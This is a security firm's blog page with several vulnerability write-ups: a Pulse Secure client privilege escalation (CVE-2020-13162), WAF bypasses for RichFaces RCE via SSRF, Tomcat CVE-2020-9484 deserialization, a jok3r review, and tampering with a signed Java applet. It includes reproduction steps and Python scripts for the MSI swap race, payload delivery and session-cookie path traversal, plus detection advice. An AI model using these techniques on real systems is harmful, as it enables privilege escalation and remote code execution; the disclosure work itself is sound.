Blog

Pulse Secure Client for Windows <9.1.6 TOCTOU Privilege Escalation (CVE-2020-13162)

In the midst of the coronavirus pandemic we have observed an incredible surge in work-from-home setups. Being able to quickly identify vulnerabilities in the components of these infrastructures has become, more than ever, a priority for many businesses. So Red Timmy thought: “it would be good to kill some 0days while we go through this hard time”.

After careful evaluation of the available options, we decided to proceed with a deep inspection of the Pulse Secure VPN client. Why? Beyond the large installation base in the Fortune 500 market, there are plenty of medium-sized companies out there adopting Pulse Secure products. Imagine a business distributing laptops to its employees through which they can connect remotely, via VPN, to the employer’s infrastructure and comfortably work from home. Of course the operating system running on these laptops is hardened in order to prevent the installation of arbitrary software, the disabling of the antivirus or other monitoring/security agents and, more generally, the execution by employees of any action that would normally require admin rights.

Now imagine an employee (perhaps a malicious insider) escalating to “NT AUTHORITY\SYSTEM” on one of these laptops, before or after establishing a connection to the company VPN: security measures, configurations and software could be disabled or tampered with, and any program or hacking tool could be installed or hidden on the system without restrictions, lowering the threat detection and identification capabilities of the SOC. How bad would that be? This is what could have happened by exploiting the vulnerability in the Pulse Secure client we are going to talk about today, before the vendor patched it. We have registered CVE-2020-13162 for it.

High-Level Overview and Impact

The Pulse Secure Client for Windows suffers from a local privilege escalation vulnerability in the “PulseSecureService.exe” service. Exploiting this issue allows an attacker to trick “PulseSecureService.exe” into running an arbitrary Microsoft Installer package (“.msi”) with SYSTEM privileges, granting the attacker administrative rights.

The vulnerability lies in the “dsInstallerService” component, which gives non-administrative users the ability to install or update components using installers provided by Pulse Secure. While “dsInstallerService” performs a signature verification on the content of the installer, it is possible to bypass the check by providing the service with a legitimate Pulse Secure installer and swapping it with a malicious one after the verification (see the Analysis section below).

The vulnerability is a TOCTOU (time-of-check to time-of-use) issue and can be exploited reliably using an exclusive opportunistic lock.

The bug can be exploited in the default configuration and we are not aware of any configuration that prevents exploitation. All the versions we tested below 9.1R6 (including the 5.x branch, such as version 5.3R70 released in January 2017) were successfully exploited during our tests. The checks were conducted on fresh installs of both Windows 10 1909 and Windows 8.1.

The bug was discovered by Giuseppe Calì (@gsepcali). A full exploit, which will be released in the near future, has been written by Marco Ortisi (more about the exploit in the notes below).

Analysis

The server component of the Pulse Secure solution, Pulse Connect Secure, provides installers to deploy on client machines. Some of these, such as “Pulse Secure Installer Service (.exe)” and “Host Checker (.exe)“, can be installed without admin privileges (see Figure 1).

Figure 1: description of one of the observed installers provided in the PCS admin interface.

Despite the statement that the packages “can be deployed with limited user privileges if a previous version of the Installer Service is running“, it turns out that a default install of the Pulse Secure client allows the installers to be run. The installers are available at “https://<pcs-host>/dana-admin/sysinfo/installers.cgi”.

Since these installers need to perform tasks requiring administrative rights (such as creating files in the “Program Files (x86)” directory), we decided to investigate how the corresponding non-privileged processes are allowed to perform privileged tasks.

The installers are self-extracting executables (see Figure 2).

Figure 2: the extracted content of the “Pulse Secure Installer Service (.exe)” package.

“Pulse Secure Installer Service (.exe)” works in the following way:

  1. It extracts its content to %TEMP%.
  2. It instructs “PulseSecureService.exe“, which runs as SYSTEM, to initiate the install process. This is done via an OLE interface exposed by the service.
  3. “PulseSecureService.exe” verifies the signature of “VerifyAndInstall.exe” using the “CryptQueryObject()” WinAPI function.
  4. If the signature is valid, “PulseSecureService.exe” copies “VerifyAndInstall.exe” to “C:\Windows\Temp\PulseXXXXXXXX\“, where “XXXXXXXX” is a hex-encoded timestamp.
  5. “PulseSecureService.exe” runs “VerifyAndInstall.exe“.
  6. “VerifyAndInstall.exe” runs a verification routine on “%TEMP%\PulseSecureInstallerService.msi“.
  7. If the verification succeeds, “PulseSecureInstallerService.msi” is copied to “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi“.
  8. “PulseSecureService.exe” runs “C:\Windows\system32\msiexec.exe” as SYSTEM with “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi” as an argument and the installation starts.

The installation process can be observed using “Procmon” with the file names above as filters.

“C:\ProgramData” is writable by non-privileged users, who can create or modify files they own but not those created by other users.

In order to reproduce the issue and run code as SYSTEM, it is necessary to:

  1. Create an empty “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi”.
  2. Set an exclusive opportunistic lock on “C:\Windows\System32\msiexec.exe” (for example with this tool: https://github.com/googleprojectzero/symboliclink-testing-tools/tree/master/SetOpLock, using the command “SetOpLock.exe C:\Windows\System32\msiexec.exe x“).
  3. Start the legitimate installer downloaded from the “Pulse Connect Secure” appliance.
  4. When the oplock is triggered, swap “C:\ProgramData\Pulse Secure\Installers\verified_PulseSecureInstallerService.msi” with a malicious “.msi” file.
  5. Release the oplock.

As a result, the malicious “.msi” file is executed with SYSTEM privileges.
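For illustration purposes only, a rough sketch of the swap step might look like the following Python snippet. It is not the full exploit: in practice the oplock on “msiexec.exe” (set with SetOpLock.exe, as described above) is what makes the race reliable, and the malicious MSI path used here is a placeholder.

# Rough illustration of the swap step (Windows, Python 3). NOT the full exploit:
# the exclusive oplock on msiexec.exe keeps the service from consuming the MSI
# until it is released, which is what makes this race reliable in practice.
import shutil
import time
from pathlib import Path

VERIFIED = Path(r"C:\ProgramData\Pulse Secure\Installers"
                r"\verified_PulseSecureInstallerService.msi")
MALICIOUS = Path(r"C:\Users\Public\evil.msi")  # hypothetical payload location

def wait_and_swap(poll_interval: float = 0.05) -> None:
    """Wait until the service drops the verified MSI, then overwrite it."""
    while not VERIFIED.exists():
        time.sleep(poll_interval)
    # Window between signature verification and msiexec.exe execution:
    # replace the verified package with our own before it is consumed.
    shutil.copyfile(MALICIOUS, VERIFIED)
    print(f"[+] Swapped {VERIFIED} with {MALICIOUS}")

if __name__ == "__main__":
    wait_and_swap()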

Detection guidance

In order to detect this issue, it is sufficient to look for a non-SYSTEM process creating or writing to “C:\ProgramData\Pulse Secure\Installers\“. As the original files are always created and written to by the PulseSecure service, non-privileged writes to this location are always non-standard behavior and a possible exploitation attempt.

Different installers install to different locations. Another file path to watch for non-privileged writes is “C:\Users\<user>\AppData\Roaming\Pulse Secure“.
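As a minimal detection sketch (assuming a simple polling approach; in a real environment you would rather rely on Sysmon/EDR file-creation events, which also tell you which user and process performed the write), something like this could flag writes to the two paths above:

# Minimal polling watcher, as a sketch only: attribution of the writing user/
# process must still be done by your endpoint telemetry.
import os
import time

WATCHED_DIRS = [
    r"C:\ProgramData\Pulse Secure\Installers",
    os.path.expandvars(r"%APPDATA%\Pulse Secure"),  # per-user roaming path
]

def snapshot(path):
    """Return {file: mtime} for every file below path (empty if path is absent)."""
    state = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            try:
                state[full] = os.path.getmtime(full)
            except OSError:
                pass
    return state

def watch(interval=5.0):
    previous = {d: snapshot(d) for d in WATCHED_DIRS}
    while True:
        time.sleep(interval)
        for d in WATCHED_DIRS:
            current = snapshot(d)
            for path, mtime in current.items():
                if previous[d].get(path) != mtime:
                    print(f"[!] write detected: {path}")  # correlate with the writing user
            previous[d] = current

if __name__ == "__main__":
    watch()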

Exploit

We have developed two different exploits for this vulnerability. See one of them in action below.

However, we are not going to release the code immediately; it will be published on our GitHub soon. Why not now? Well, we have realized that in practice it is very difficult for Pulse Secure customers to understand whether the release of a new version of the VPN client provides a security fix or just a feature update. In fact, at the time of writing, neither the release notes of VPN client version 9.1R6 (the only one not affected) nor the Security Advisories published on the Pulse Secure website mention that previous versions of the product were affected by CVE-2020-13162.

The natural consequence of this is that there is a very high chance nobody has actually updated the client to the latest available version, because nobody is really aware that it provides a bug fix rather than just a feature update.

Update: 24 hours after we disclosed this vulnerability, Pulse Secure has released a security advisory related to it.

That’s all for today. Remember to follow us on twitter and while you are there connect to @gsepcali. More vulnerabilities and Red Team stories are coming…stay tuned!

Disclosure timeline

Vulnerability discovered: April 13th, 2020
Vendor contacted: April 15th, 2020
Vendor’s reply: April 17th, 2020
Patch released: May 22nd, 2020
Red Timmy Disclosure: June 16th, 2020
Security Advisory released by Pulse Secure: June 17th, 2020

Exploit release: date to be confirmed

How to hack a company by circumventing its WAF for fun and profit – part 3

One of the tools we are most proud of is Richsploit, which we released a few months ago. It allows the exploitation of EL injection and Java deserialization vulnerabilities in multiple versions of RichFaces, an infamous Java library included with many JSF frameworks. The reason for our pride, however, is not simply the pleasure of being able to execute arbitrary code on a remote system: it is also the time spent making Richsploit work in certain environments, which is at the heart of the stories about WAFs and other layer-7 security devices we are going to share with you today.

To scope or not to scope, that’s the problem

As part of our preparation process for a security test or exercise, we normally go through a scoping document together with the customer in order to gain as much information as possible about the environment we will have to test. We do this because the list of components, middleware solutions, libraries, etc. obtained this way sometimes allows us to spot in advance elements useful for defining a potential attack path, which saves us a lot of time during the actual security test. The starting point of our story is exactly this. From the scoping document of one of our tests we identified a component that used the RichFaces 3.x library, known to be vulnerable even though no public exploit existed for it. So, what does the sympathetic little Red Timmy normally do in these cases? Of course he installs that component, and with it the exact version of the vulnerable RichFaces library, in his local lab in order to develop and test the exploit there. And that is what we did. Two weeks before the official start date of the task, we had a full-fledged exploit in our hands!

Then comes the day of the security test in the real customer environment. Same component… same version of RichFaces, but this time the target application sits at the very end of a chain of proxies, load balancers and firewalls about which we knew nothing. And of course the exploit developed and tested in our lab refuses to work there…

An ASCII character will save us all

We immediately started searching for the root cause, and here is what we discovered. RichFaces implements a custom base64 encoder that does something a normal base64 encoder would never dream of doing: it outputs an encoded object (a string, to simplify) containing one or more exclamation marks. Something like this:

To exploit the vulnerability, the malicious encoded object generated with the Richfaces custom base64 encoder must be passed to the server in the URI of an HTTP GET request, along with the ‘!’ symbol(s). Something like that:

However, for some reason the target application had no intention of serving requests with an exclamation mark in the path. Weird! In our local lab everything worked fine. To put it simply, something was preventing our payload from turning into a beautiful RCE primitive. We had never hated the exclamation mark so much before. A possible explanation was that one of the front-end network devices was unhappy with that type of request. But honestly we will never know, as the case was not investigated at the end of the activity.

Meanwhile, we noticed that the target application used a semicolon character to separate the path from the query string, like this:

https://www.bucamitutto.com/appname/path/;jsessionid=DC3DE8B0 [...]

According to RFC 3986, a semicolon “is often used to delimit parameters and parameter values”.

What if we put a semicolon ‘;’ character in front of the Richfaces encoded object as shown below?

  • The server interprets the encoded object (in purple) not as part of the path but as part of the query string, where the symbol ‘!’ is allowed. So WAFs, load balancers and proxies have nothing to complain about.
  • The RichFaces base64 decoding will still be successful, because the semicolon is a non-base64 character and, according to RFC 2045, “Any characters outside of the base64 alphabet are to be ignored”.
  • Because of what the RFC mandates, the RichFaces base64 decoder will not terminate or throw an error when it encounters the semicolon, but will skip over it and continue decoding as if the character were not there (see the sketch after this list).
  • The malicious payload is then correctly decoded and processed by RichFaces.
  • The payload is executed and RCE condition achieved. Victory!  \o/
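As a toy illustration of this behaviour, the following snippet uses Python’s standard base64 decoder (not the RichFaces custom one, which additionally emits characters such as ‘!’) to show that a prepended semicolon is simply skipped during decoding:

# Toy demonstration of the RFC 2045 behaviour described above:
# non-alphabet bytes such as ';' are discarded before decoding.
import base64

payload = base64.b64encode(b"malicious serialized object").decode()
smuggled = ";" + payload          # semicolon prepended, as in the bypass

decoded = base64.b64decode(smuggled, validate=False)  # default: ignore junk chars
assert decoded == b"malicious serialized object"
print(decoded)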

The last resort

When moving from RichFaces 3.x to RichFaces 4.x, the endpoint to shoot at is different from the one seen in the previous paragraph. With RichFaces 4.x it is something similar to:

https://www.bucamitutta.com/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>

The request can be sent either as GET or POST: Richfaces handles both methods.

One day the astute Red Timmy faced a situation that was, until that moment, unusual for him. The application under analysis showed traces of the resources that normally decorate RichFaces front-end elements, but an F5 BIG-IP device blocked any access to the “MediaOutputResource” component.

The device had the Application Security Manager (ASM) and Local Traffic Manager (LTM) modules enabled and a set of custom iRules deployed. The WAF policy was configured in blocking mode, meaning that an error message with a support ID was returned back in case of attack detection.

The custom rules checked that:

  1. the path of each HTTP request did not point to the URL of the “MediaOutputResource” component and the URI did not contain the “do” parameter;
  2. in case of a POST request, in addition to the check on the path, the presence of the “do” parameter was verified in the request’s body rather than in the URI.

Specifically, rule “1” was applicable to all HTTP methods, not only GET. If the checks were not passed, the request was blocked and an error message was returned to the client.

In addition, unlike what we observed in another of our blog posts, no percent-decoding misconfigurations could be found. Everything looked fine. With such a configuration in place nothing can go wrong, right?

However, at a certain point we noticed that our target application was exposing the servlet “auth”. It was reachable via POST and took as input the parameter “res”, which in the request we intercepted with Burp pointed to a URL inside the target domain.

For example, if “res=https://someserver.somedomain/path?querystring” is provided in the request’s body, the servlet issues a subsequent request like this:

HEAD /path?querystring HTTP/1.1
Host: someserver.somedomain
[...]

Fundamentally, it sends out an HTTP HEAD request based on the content of the parameter “res”. This means we are totally in control of the path, the query string and the target server. We cannot control the HTTP method (all the requests are sent out with the HEAD method by default), but that is not a problem, as RichFaces 4.x can be exploited through GET, which is syntactically similar to HEAD. The only difference is that with HEAD the HTTP body is not returned in the reply, but we will survive that.

Honestly, we are not even “totally” in control of the target server: there is a restriction based on the domain. We could not go outside of the domain we were targeting at that moment (somedomain in the example above). But that was not a problem either, as the RichFaces instance we wanted to exploit lived inside that domain.

Given these premises, what if we set the parameter “res” to the value “https://allowedHost.somedomain/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>” ?
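As a rough sketch of this delivery step (the hostnames, the “/appname/auth” servlet path and the payload value are placeholders; only the “res” and “do” parameter names come from the case described above), the request could be built like this:

# Sketch of the SSRF-assisted delivery; the encoded payload itself would come
# from a RichFaces 4.x exploit such as Richsploit.
import requests

TARGET = "https://www.bucamitutta.com/appname/auth"      # hypothetical path to the "auth" servlet
INTERNAL = ("https://allowedHost.somedomain/rfRes/"
            "org.richfaces.resource.MediaOutputResource.faces")
encoded_payload = "<malicious_encoded_payload>"           # placeholder

# The WAF only sees a POST to the auth servlet whose body contains "res=...";
# the "do" parameter exists solely inside the value of "res".
resp = requests.post(
    TARGET,
    data={"res": f"{INTERNAL}?do={encoded_payload}"},
    timeout=10,
)
print(resp.status_code)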

The request crosses the chain of load balancers, firewalls, proxies, etc. completely untouched. Why untouched? Because rules “1” and “2” are not applicable in this case. According to these rules:

  • The path must not point to the URL of MediaOutputResource -> indeed it is set to “/auth”.
  • The URI must not contain the “do” parameter -> in fact there is no “do” parameter.
  • In case of a POST request (…and we have a match here) the “do” parameter must not be present in the request’s body. And indeed the request body contains only the parameter “res”. The string “do” exists only as part of the content pointed to by the “res” parameter (and not as a parameter per se), which is not a sufficient condition to block the request.

So, now that we are convinced the request passes through, let’s see what comes next. The request finally lands at the “auth” servlet on the web application server. Here the content of the “res” parameter is extracted and the following HTTP request is issued:

HEAD /rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload> HTTP/1.1
Host: allowedHost.somedomain
[...]

Due to the WAF configuration mentioned before, this request would be blocked *if* it were sent from the internet. Indeed, rule “1” would be triggered (the path points to the MediaOutputResource component and the “do” parameter is now present in the URI). However, when a malicious request is reflected via SSRF, as in our case, it normally comes from inside the targeted network, ideally from localhost if the SSRF endpoint shares the same vhost with the RichFaces component, or even from a different vhost configured on the same server. In such cases the request no longer crosses the WAF(s), load balancers or other security appliances, which are all bypassed (see the picture below).

Indeed, after our payload triggered the vulnerability and we managed to compromise the target system, a grep for “127.0.0.1” in the web application server’s log files revealed the following:

In simple terms, the HEAD request to “/rfRes/org.richfaces.resource.MediaOutputResource.faces?do=<malicious_encoded_payload>” was clearly coming from localhost, where the vulnerable RichFaces component also resided, without ever leaving the targeted system.

And that was another great victory. \o/ \o/

The bottom line

As the Red Timmy’s grandfather always said: “When you need to bypass WAF, the last resort is SSRF”.

These and other WAF policy and signature bypass techniques (like shell globbing, undefined variables, self-referencing folders, etc.) will be taught, along with additional updated content, in our Practical Web Application Hacking Advanced Training on 3-4 August. This year the course will be delivered entirely in virtual format. Follow the news on the main page!

And don’t forget to follow us on twitter too: https://twitter.com/redtimmysec

Apache Tomcat RCE by deserialization (CVE-2020-9484) – write-up and exploit

A few days ago, a new remote code execution vulnerability was disclosed for Apache Tomcat. Affected versions are:

  • Apache Tomcat 10.x < 10.0.0-M5
  • Apache Tomcat 9.x < 9.0.35
  • Apache Tomcat 8.x < 8.5.55
  • Apache Tomcat 7.x < 7.0.104

In other words, all versions of tomcat 7, 8, 9 and 10 released before April 2020. This most certainly means you have to update your instance of tomcat in order not to be vulnerable.

Prerequisites

There are a number of prerequisites for this vulnerability to be exploitable.

  1. The PersistentManager is enabled and it’s using a FileStore
  2. The attacker is able to upload a file with arbitrary content, has control over the filename and knows the location where it is uploaded
  3. There are gadgets in the classpath that can be used for a Java deserialization attack

Tomcat PersistentManager

First some words about the PersistentManager. Tomcat uses the word “Manager” to describe the component that does session management. Sessions are used to preserve state between client requests, and there are multiple decisions to be made about how to do that. For example:

  • Where is the session information stored? In memory or on disk?
  • In which form is it stored? JSON, serialized object, etc.
  • How are sessions IDs generated?
  • Which sessions attributes do we want to preserve?

Tomcat provides two implementations that can be used:

  • org.apache.catalina.session.StandardManager (default)
  • org.apache.catalina.session.PersistentManager

The StandardManager will keep sessions in memory. If tomcat is gracefully closed, it will store the sessions in a serialized object on disk (named “SESSIONS.ser” by default).

The PersistentManager does the same thing, but with a little extra: swapping out idle sessions. If a session has been idle for x seconds, it will be swapped out to disk. It’s a way to reduce memory usage.

You can specify where and how you want swapped sessions to be stored. Tomcat provides two options:

  • FileStore: specify a directory on disk, where each swapped session will be stored as a file with the name based on the session ID
  • JDBCStore: specify a table in the database, where each swapped session will be stored as individual row

Configuration

By default, Tomcat runs with the StandardManager enabled. An administrator can configure Tomcat to use the PersistentManager instead by modifying conf/context.xml:

<Manager className="org.apache.catalina.session.PersistentManager"
         maxIdleSwap="15">  
  <Store className="org.apache.catalina.session.FileStore"
         directory="./session/" />
</Manager>  

When there is no Manager tag written in context.xml, the StandardManager will be used.

The exploit

When Tomcat receives a HTTP request with a JSESSIONID cookie, it will ask the Manager to check if this session already exists. Because the attacker can control the value sent in the request, what would happen if he put something like “../../../../../../tmp/12345“?

  1. Tomcat asks the Manager to check whether a session with session ID “../../../../../../tmp/12345” exists.
  2. It will first check if it has that session in memory.
  3. It does not. But the currently running Manager is a PersistentManager, so it will also check if it has the session on disk.
  4. It will check at location directory + sessionid + ".session", which evaluates to “./session/../../../../../../tmp/12345.session“.
  5. If the file exists, it will deserialize it and parse the session information from it.

The web application will return an HTTP 500 error upon exploitation, because it encounters a malicious serialized object instead of one that contains session information as it expects.

The line marked in red in the stack trace above shows that the PersistentManager tries to load the session from the FileStore. The blue line then shows that it tries to deserialize the object. The error is thrown after deserialization has succeeded, when Tomcat tries to interpret the object as a session (which it is not). The malicious code has already been executed at that point.

Of course, all that is left to exploit the vulnerability is for the attacker to put a malicious serialized object (e.g. generated by ysoserial) at the location /tmp/12345.session.
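A minimal sketch of the triggering request, assuming the malicious object has already been written to /tmp/12345.session through a separate file upload vulnerability (the target URL is a placeholder):

# Trigger the path-traversal session load; Tomcat appends ".session" itself.
import requests

url = "http://target.example:8080/app/index.jsp"   # any URL handled by the vulnerable app
cookies = {"JSESSIONID": "../../../../../../tmp/12345"}

r = requests.get(url, cookies=cookies, timeout=10)
# An HTTP 500 here is expected: deserialization (and the gadget chain) has
# already run by the time Tomcat fails to cast the object to a session.
print(r.status_code)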

It doesn’t make much sense to create an exploit as it’s just one HTTP request. There is however a very quick and convenient PoC written by masahiro311, see this GitHub page.

Conclusion

This attack can have high impact (RCE), but the conditions that need to be met make the likelihood of exploitation low.

  • PersistentManager needs to be enabled manually by the tomcat administrator. This is likely to happen only on websites with high traffic loads (but not too high, as it will be more likely that a JDBC Store is used instead of a File Store)
  • The attacker has to find a separate file upload vulnerability to place the malicious serialized file on the server.
  • There have to be libraries on the classpath which are vulnerable to be exploited by a Java deserialization attack (e.g. gadgets).

However, a large range of versions of tomcat are affected.

To learn more about advanced web application attacks like these, register for our virtual course at BlackHat USA 2020: Practical Web Application Hacking Advanced.

And don’t forget to follow us on twitter: @redtimmysec

Speeding up your penetration tests with the Jok3r framework – Review

As penetration testers doing tests on web applications and infrastructure, we use a lot of tools to speed up our jobs. We scan the network with nmap, if we find a web server we might fire off nikto and dirbuster and for an exposed RMI port we try remote deserialization attacks with BaRMIe. Still, it’s a sequential activity: we try one tool one-after-another. What if we had a framework that would

  • Have all tools available and up to date
  • Run tools, analyze their output and run other relevant tools

This is the aim of the jok3r framework (https://www.jok3r-framework.com/). According to its front page, it aims to “automate as much stuff as possible in order to quickly identify and exploit ‘low-hanging fruits’ and ‘quick win’ vulnerabilities on most common TCP/UDP services and most common web technologies”.

We put the tool to the test to see whether it is really useful or just a waste of time.

Setting up

Jok3r conveniently runs in a docker container with all tools pre-installed. Setting up is just a matter of running a docker pull command and executing the container. Because a lot of tools are there, the compressed size (what you will pull) is around 9 GB. Uncompressed it takes about 16GB on disk.

Usability

Once pulled, you can run the container which brings you to a bash shell in an ubuntu based image. After that, each command to jok3r has to be given like this:

python3 jok3r.py [command]

That’s a little inconvenient, compared to tools like Metasploit which have their own interactive interpreter. I guess you could write a wrapper yourself, but it’s disappointing that it’s not there by default.

Overview of all tools available

Running python3 jok3r.py toolbox --update-all --fast will auto-update all tools.

Unfortunately, after running all updates (which sometimes required manual confirmation even though the --fast parameter was given), jok3r.py didn’t run anymore because of an updated Python library (cmd2) that was incompatible. We reported this issue at https://github.com/koutto/jok3r/issues/43

Testing

Jok3r uses the concept of a ‘mission’ to describe a security test. By running python3 jok3r.py db, we get into an interactive shell (so part of the framework does use one… why not everything?), where we can define the mission name, target IPs, and the specific scans we want to enable/disable. It’s also possible to import nmap results from an XML file, but unfortunately we got a parser error when trying to do that.

Once we have defined the target, we can run python3 jok3r.py attack -t https://www.example.com/ --add2db <mission> to run all security checks. Jok3r will now run each and every tool suitable for an HTTP endpoint one by one (more than 100). It’s smart enough to parse the output of recon tools, so it can skip vulnerability checks and exploits later on. For example, when it finds no instance of a WordPress application, wpscan is skipped.

Starting the security checks on our target

Unfortunately, some tools will hang and have to be killed with ctrl-c. That makes it unsuitable for a fire-and-forget approach, as you have to kill tasks from time to time.

We tested an HTTP service, for which it has about 100 checks. There are checks available for ftp, java-rmi, mysql, oracle, rdp, smb, snmp, ssh and a few more smaller services; however, the number of checks done for these is very small (around 7 on average). It looks like jok3r is mainly geared towards pen testing web applications.

Reporting

When the scan is finished, you can generate an HTML report which will conveniently list the output of the tools, as well as found vulnerabilities. This interface is very suitable for browsing results, rather than looking at the command line output.

The clickable HTML report lists the output of each tool

Conclusion

The concept of jok3r is very interesting, and using the tool definitely speeds up pen tests. It’s beneficial mainly for infrastructure tests where you need to scan a large number of IPs, which would be a lot of work to do manually. Be aware that the number of services it can scan is limited.

If jok3r was truly fire-and-forget, it would have been a convenient way to get some extra recon done. But unfortunately it depends on 3rd party tools which can crash or hang, and the user has to manually intervene. Therefore, in our opinion it doesn’t add much value over tools like nessus or service scans from nmap.

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

Practical Web Application Hacking Advanced 1-2 August and 3-4 August 2020.

Exploiting JD bugs in crypto contexts to achieve RCE and tampering with Java applets

A little over two months ago at Red Timmy Security we released EnumJavaLibs, a tool that discovers which libraries are available in the classpath of a remote Java application.

The original idea behind developing such a tool is very interesting and we think it would be a shame not to talk about it. It came from an assessment conducted a year and a half ago which led to the discovery of a Java deserialization vulnerability in a critical application.

As we are under NDA for that project, we cannot divulge the name of the vendor or the product affected. However, we can describe the architecture generically and give you something juicy to learn from.

General architecture

The solution to analyse was a web application written with GWT that could be accessed only after TLS mutual authentication by means of an HSM (Hardware Security Module) device. The authentication process required a Java applet.

The Google Web Toolkit Framework (GWT) was used for both server and client components. Separate from the GWT implementation, as already said, there was a Java Applet. It was downloaded by the user’s browser during the interaction with the front-end web application before authentication. It was utilized solely for communicating with the hardware token, client side, where a private key was stored.

Basically the GWT-server application and the GWT-client component were in direct communication. Also the GWT-client component spoke to the Java applet which in turn talked to the hardware token to perform operations such as data signing, needed during the authentication process. This information was finally transmitted to the server by the GWT-Client. The following diagram should clarify the generic architecture.

But let’s start from scratch.

The authentication process

When the hardware token is plugged in, a PIN is typed in to unlock the device and the login can start. At this point the authentication process is initiated and a Login request to the server is issued (see screenshot below).

The Login request is very interesting because it contains an ASN.1 DER encoded stream (starting with “MII[..]” in the POST body) wrapped in another layer of Base64 encoding. Why don’t we decode it with the “openssl” binary and look inside?

Line 62 reveals the presence of a Java serialized object (sequence “ACED0005”) containing what seems to be a random number, a session ID and a timestamp. Maybe it will be deserialized on the server side? To test our hypothesis we replaced the object at line 62 with something else (another payload generated with “ysoserial”) and submitted it to the server. However, the procedure did not seem to work properly. But why? The answer we were looking for arrived after we decided to decompile and analyse the Java applet too.

The analysis confirmed that we were right: at line 62 there is a Java serialized object, but line 1591 contains an RSA-SHA256 digital signature which protects the Java object itself from tampering. Now it is clear why the server is not collaborating: in order to inject our own Java serialized payload at line 62 we need a way to bypass that digital signature. One approach might be to find a way to get the private key out of the hardware token, but this would probably keep us busy for a long time. We opted instead for the “collaborative” approach. The Java applet cannot access the private key directly; however, it can ask the HSM (through an interface specially exposed) to sign an arbitrary value and return it to the applet. The Java applet could be modified as just described and act as our proxy, but there is another problem: it is digitally signed too, and with the latest versions of the JRE, Java refuses to run it even if we set all the security checks to the minimum possible.

Bypassing the Java checks and opening our way to JD

This is how we bypassed it in nine steps and managed to inject an arbitrary serialized payload:

  1. The Java serialized object that holds the attacker payload is generated with “ysoserial” or similar tools.
  2. The applet is downloaded from the web server, decompiled, and its code is modified so that it reads from disk the custom Java object generated at step 1 just before it is digitally signed.
  3. All the signature files inside “appletfile.jar/META-INF” are deleted. This makes the applet unsigned.
  4. The Java applet is now signed again, but this time with a self-signed certificate:

      $ keytool -genkey -keyalg RSA -alias myKey -keystore myKeystore -validity 360

      $ jarsigner -keystore myKeystore -verbose appletfile.jar myKey

  5. The security settings in the Java configuration are set to “High” (the lowest value). The target website is also added to the exception list and the certificate generated at step 4 is imported as a “Secure Site CA”. This decreases and circumvents the security controls of the local Java installation. There are multiple other ways to achieve the same result, so feel free to follow any procedure you are comfortable with.
  6. We browse the target website as usual for the first time. The “appletfile.jar” is downloaded and stored by Java in its cache.
  7. We then locate the jar file inside the browser cache directory and replace it with the modified and re-signed applet.
  8. We close the browser and open it again, visiting the target website for the second time. Java will complain about the modified applet, but all the security warning messages popping up can be safely ignored.
  9. Upon logging in, our custom serialized Java object is signed and sent to the server.

Logging in of course fails, but the Java deserialization attack has already happened at this point. In our specific case we noticed that the server’s reply would change based on what we stored inside our object. For example, if we serialize an empty “String” object, the reply shows the code XXXX5:

HTTP/1.1 200 OK
Connection: close

//EX[4,0,3,'WdZtoTv',2,0,1,["com.xxxxxxxxxxxxxxxx.xxxxClientException/1437829146","java.util.Date/3385151746","XXXX5","Your operation failed due to an internal error. "],0,7]

If instead we serialize a nonexistent object (one not in the classpath of the remote Java application), a similar text message is received in the reply, but with the code “XXXX9” instead. In simple terms the application is behaving as an oracle! Hence the idea to create EnumJavaLibs! Since the server responds with two different error codes, this fact can be leveraged to find out which libraries it has in the classpath and to customize the attack, instead of blindly generating payloads.
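Conceptually, the oracle-based enumeration can be sketched as follows. This is not the actual EnumJavaLibs implementation: the endpoint is a placeholder, one pre-generated serialized blob per candidate library is assumed to exist on disk, and the wrapping/signing step performed by the modified applet in our engagement is reduced to a stub.

# Sketch of the oracle idea: send one serialized blob per candidate library
# and classify the reply by the error code it contains.
import pathlib
import requests

ENDPOINT = "https://target.example/login"          # hypothetical login endpoint
PAYLOAD_DIR = pathlib.Path("payloads")             # one .ser file per candidate library

def wrap_and_sign(serialized: bytes) -> bytes:
    # Placeholder: in the engagement described above, the modified applet asked
    # the hardware token to sign the object and wrapped it in the ASN.1/Base64
    # login structure. That step is environment-specific and not reproduced here.
    return serialized

def library_present(reply_text: str) -> bool:
    # XXXX5 = deserialized but not a LoginRequest -> class exists on the classpath
    # XXXX9 = readObject() failed                 -> class not found
    return "XXXX5" in reply_text

for blob in sorted(PAYLOAD_DIR.glob("*.ser")):
    body = wrap_and_sign(blob.read_bytes())
    reply = requests.post(ENDPOINT, data=body, timeout=15)
    status = "present" if library_present(reply.text) else "absent"
    print(f"{blob.stem}: {status}")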

Due to the limited amount of time left to close the investigation, and in order to confirm whether what we had discovered was actually a Java deserialization vulnerability or something else, we asked the vendor for permission to look at the server-side code. Our request was eventually accepted, and this is what we found.

On the server side, in the part of the code handling the incoming login request, inside “pkcs7.getContentStream()” there is the call to “readObject()” performing the deserialization. This confirms the criticality of the vulnerability.

As can be seen from the above two code snippets, exception “XXXX9” is thrown when “readObject()” fails, i.e. when anything goes wrong during deserialization. Exception “XXXX5” is thrown instead when the object that is read is not an instance of LoginRequest, which occurs after deserialization and does not prevent the attack from taking place. Of course bad things can be done only if a valid gadget chain is provided (there was no look-ahead protection implemented, by the way), but it is not the goal of this blog post to talk about that.

Conclusion

Nice experience! As a general recommendation, do not trust user input when performing deserialization and implement look-ahead protection to prevent an unexpected object from being deserialized.

From an attacker’s standpoint, be aware that Java serialized objects can be hidden inside other data structures, such as certificates. Also, digital signatures on Java applets only protect against attackers who swap an applet with a malicious one in transit, in which case the client gets warnings. They will NOT protect against attackers tampering with an applet running on their own systems: they can just ignore the warnings.

Finally, if you have an application acting as an oracle when sending (malformed) serialized objects, try EnumJavaLibs. Below some references in case you want to do a deep dive into the topic. And don’t forget to follow us on twitter: https://twitter.com/redtimmysec

References:

https://www.owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization

https://www.ibm.com/developerworks/library/se-lookahead/index.html

Hey! Red Timmy Security will be at Blackhat Las Vegas this year too! Check out our trainings!

